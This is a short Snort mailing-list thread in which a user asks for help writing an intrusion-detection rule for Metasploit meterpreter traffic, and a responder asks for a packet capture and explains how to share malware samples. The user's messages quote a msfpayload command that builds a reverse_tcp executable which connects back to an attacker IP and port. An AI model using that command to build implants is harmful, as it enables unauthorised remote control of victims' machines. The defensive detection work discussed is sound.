Snort mailing list archives
Re: how to write rule for msfpayload in linux
From: DFIRob via Snort-users <snort-users () lists snort org>
Date: Mon, 20 Nov 2017 21:31:35 +0100
Your link has been blocked by google drive. In the future, please share a zip file with the password 'virus' or 'infected' to prevent automated removal. Also, since msf is open source, I encourage you to dig into how they implement network traffic between the implant and the C2 server. --rob On Sun, Nov 19, 2017 at 2:31 AM, nguyen cao <nguyenblack1995 () gmail com> wrote:
On the attacker I use: msfpayload windows/meterpreter/reverse_tcp LHOST=(IP_attacker) msfpayload2 <https://drive.google.com/file/d/10MzIeyeThWHMfuhNyDJTuG3Y4QJ_qjcA/view?usp=drive_web> LPORT=4444 X > /root/Desktop/payload.exe ( in order to create file payload.exe). When I run file payload.exe on PC victim , I will take control system of victim. I run wireshark and match packet but I do not know where to start in order to write rule for type this attack 2017-11-19 2:16 GMT+07:00 DFIRob <rd.seclists () gmail com>:Hi, do you have a pcap that you want to alert on? On Sat, Nov 18, 2017 at 3:22 PM, nguyen cao via Snort-users < snort-users () lists snort org> wrote:who can help me about write rule for msfpayload in linux ? creat payload by msfpayload : msfpayload windows/meterpreter/reverse_tcp LHOST=/ / LPORT=/ /.... _______________________________________________ Snort-users mailing list Snort-users () lists snort org Go to this URL to change user options or unsubscribe: https://lists.snort.org/mailman/listinfo/snort-users Please visit http://blog.snort.org to stay current on all the latest Snort news! Please follow these rules: https://snort.org/faq/what-is- the-mailing-list-etiquette
_______________________________________________ Snort-users mailing list Snort-users () lists snort org Go to this URL to change user options or unsubscribe: https://lists.snort.org/mailman/listinfo/snort-users Please visit http://blog.snort.org to stay current on all the latest Snort news! Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette
Current thread:
- how to write rule for msfpayload in linux nguyen cao via Snort-users (Nov 18)
- Re: how to write rule for msfpayload in linux DFIRob via Snort-users (Nov 18)
- Re: how to write rule for msfpayload in linux nguyen cao via Snort-users (Nov 18)
- Re: how to write rule for msfpayload in linux DFIRob via Snort-users (Nov 20)
- Re: how to write rule for msfpayload in linux nguyen cao via Snort-users (Nov 18)
- Re: how to write rule for msfpayload in linux DFIRob via Snort-users (Nov 18)